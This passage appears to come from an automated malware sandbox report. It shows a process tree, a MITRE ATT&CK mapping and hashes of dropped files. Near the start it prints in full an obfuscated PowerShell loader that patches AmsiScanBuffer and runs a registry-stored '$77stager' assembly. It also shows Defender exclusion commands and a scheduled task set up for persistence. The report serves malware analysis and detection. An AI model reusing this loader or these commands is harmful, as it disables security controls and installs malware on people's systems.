'+'u'+''+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$PsEFxNOHqraMOw).SetImplementationFlags('Run'+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$XzLHPKRelZM.DefineMethod('I'+[Char](110)+'vo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+'ByS'+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+'ua'+'l'+'',$YbIucFvpZQ,$PsEFxNOHqraMOw).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+''+'i'+''+'m'+''+'e'+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $XzLHPKRelZM.CreateType();}$orHlKjXxHkKZp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+'e'+'m'+'.'+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'of'+'t'+''+'.'+'Wi'+'n'+'32'+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+'a'+'ti'+[Char](118)+'e'+'M'+''+'e'+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+'s'+'');$krEFWrOTZxAqdk=$orHlKjXxHkKZp.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+'es'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BgYZyGLzmSJFYnabOmG=cAYNCcTcmszh @([String])([IntPtr]);$xgYazgiQqexNSeZQFSfYqL=cAYNCcTcmszh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JgZzlOoKcMA=$orHlKjXxHkKZp.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+'dule'+'H'+''+'a'+''+'n'+''+'d'+'le').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+'2'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$hAoRtxmFIJJPmG=$krEFWrOTZxAqdk.Invoke($Null,@([Object]$JgZzlOoKcMA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$RidjnyUtggZheBinS=$krEFWrOTZxAqdk.Invoke($Null,@([Object]$JgZzlOoKcMA,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$LDmguuO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hAoRtxmFIJJPmG,$BgYZyGLzmSJFYnabOmG).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i'+'.'+'dll');$MlHPDqffQVTAqsEKk=$krEFWrOTZxAqdk.Invoke($Null,@([Object]$LDmguuO,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'nB'+'u'+'ff'+[Char](101)+''+'r'+'')));$krydgFXIbM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RidjnyUtggZheBinS,$xgYazgiQqexNSeZQFSfYqL).Invoke($MlHPDqffQVTAqsEKk,[uint32]8,4,[ref]$krydgFXIbM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MlHPDqffQVTAqsEKk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RidjnyUtggZheBinS,$xgYazgiQqexNSeZQFSfYqL).Invoke($MlHPDqffQVTAqsEKk,[uint32]8,0x20,[ref]$krydgFXIbM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$77s'+'t'+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2308
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tsOUPQFYdYon{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KxpGLIadlmRrqI,[Parameter(Position=1)][Type]$onNrDsZeZy)$HOSCMNXOzSD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+'or'+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'ass,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+'n'+[Char](115)+''+'i'+'Cl'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$HOSCMNXOzSD.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+'am'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KxpGLIadlmRrqI).SetImplementationFlags('R'+'u'+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');$HOSCMNXOzSD.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$onNrDsZeZy,$KxpGLIadlmRrqI).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');Write-Output $HOSCMNXOzSD.CreateType();}$yJDQbttomEaNQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'ll')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+''+'i'+''+'n'+'32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+'ds');$CtAPTgbxuQlPLg=$yJDQbttomEaNQ.GetMethod(''+'G'+''+'e'+''+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](83)+'t'+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TOUYLBEAQaNxAOLLOuY=tsOUPQFYdYon @([String])([IntPtr]);$fPVRuOQGrHUKxodBHHnQjx=tsOUPQFYdYon @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hlOKPonNxho=$yJDQbttomEaNQ.GetMethod(''+[Char](71)+'etM'+[Char](111)+'dul'+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$duorpEbUltsSrA=$CtAPTgbxuQlPLg.Invoke($Null,@([Object]$hlOKPonNxho,[Object]('L'+'o'+''+'a'+''+'d'+''+[Char](76)+'i'+[Char](98)+'r'+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$lTGwLmuePNEIhTopE=$CtAPTgbxuQlPLg.Invoke($Null,@([Object]$hlOKPonNxho,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+'ct')));$DDxyYFD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($duorpEbUltsSrA,$TOUYLBEAQaNxAOLLOuY).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$ItWwNTSkFKcfPZlSY=$CtAPTgbxuQlPLg.Invoke($Null,@([Object]$DDxyYFD,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+'B'+'u'+[Char](102)+'f'+[Char](101)+'r')));$tnvvVBUDBh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lTGwLmuePNEIhTopE,$fPVRuOQGrHUKxodBHHnQjx).Invoke($ItWwNTSkFKcfPZlSY,[uint32]8,4,[ref]$tnvvVBUDBh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ItWwNTSkFKcfPZlSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lTGwLmuePNEIhTopE,$fPVRuOQGrHUKxodBHHnQjx).Invoke($ItWwNTSkFKcfPZlSY,[uint32]8,0x20,[ref]$tnvvVBUDBh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:3648
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4892
- C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
  C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2936
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    3⤵
    PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1384
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1468

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Modifies data under HKEY_USERS
PID:2556

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2060

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:700

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304
- C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
  "C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1444
- - C:\Users\Admin\AppData\Local\Temp\$77svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\$77svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1832
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:3124
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:72
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA028.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:1968
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1372
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4152
    - - C:\Users\Admin\AppData\Roaming\WinUpdate.exe
        
        "C:\Users\Admin\AppData\Roaming\WinUpdate.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\wrmeaz.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\wrmeaz.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\wrmeaz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wrmeaz.exe"
        8⤵
        Executes dropped EXE
        
        PID:3532
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rjsztz.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rjsztz.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\rjsztz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rjsztz.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:3464
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\olpylu.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4152
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\olpylu.exe"'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\olpylu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\olpylu.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3468

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3840

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3920

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:2168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:828

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1412

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3476

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3652

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3028

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
faa2dd409bb88491b6c57728dbf8a673

SHA1
6095f074030e7599cb1f9c251c62e2c0d1fb7418

SHA256
955d02ee998eae94048f3a1b33c8eedc73276ef0a179efb1cebc970d9af0df09

SHA512
0ab69299400998bc05fe7074b2c9b01162db9343deab22b502a26c47a054d2ca42918908fcc77a8cc5d275c17635508d546c3f65d857f37a7331ec9c32a766ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
4e17bd1a855c665d755cca8c76a4ed1e

SHA1
84bf56db8498ab807beaea9bc93923a91ccb7807

SHA256
9248b7e4a9c70ace3ff342d2b60f738dbe9e3acf0f023a32b273c87a8243d464

SHA512
513da9741da1be076179d88fcbde76e91bd9799ed64d57f7fdc76f6c97e8e593e9fc4f0a2c40ec74db08b25ab141ec7586bb72a7e2fca646d3e0dbb3f72beae9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
